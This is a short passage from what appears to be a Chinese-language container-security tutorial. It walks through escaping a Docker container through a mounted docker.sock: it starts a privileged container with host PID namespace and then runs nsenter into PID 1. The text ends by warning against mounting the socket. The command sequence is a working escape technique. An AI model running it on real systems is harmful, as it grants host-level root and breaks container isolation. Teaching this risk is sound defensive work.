docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock --name my-ubuntu --cap-drop ALL aeifkz/my-ubuntu:v1.0 bash ;
capsh --print ;
docker cp $(which docker) my-ubuntu:/ ;
docker exec -it -u root my-ubuntu bash ;
/docker ps ;
docker run --rm -it --privileged --pid host aeifkz/my-ubuntu:v1.0 bash ;
#逃逸完成
nsenter -m -u -i -n -p -t 1 bash ;
這個逃逸手法比較簡單一些,但重點在於即便只給容器使用 root 帳號並且拔除所有權限,但不小心把 docker.sock 掛進去的話一樣可以操作 docker 新增一個特權容器後進行逃逸,所以掛載 docker.sock 這部分需要更加小心謹慎。
今日總結 :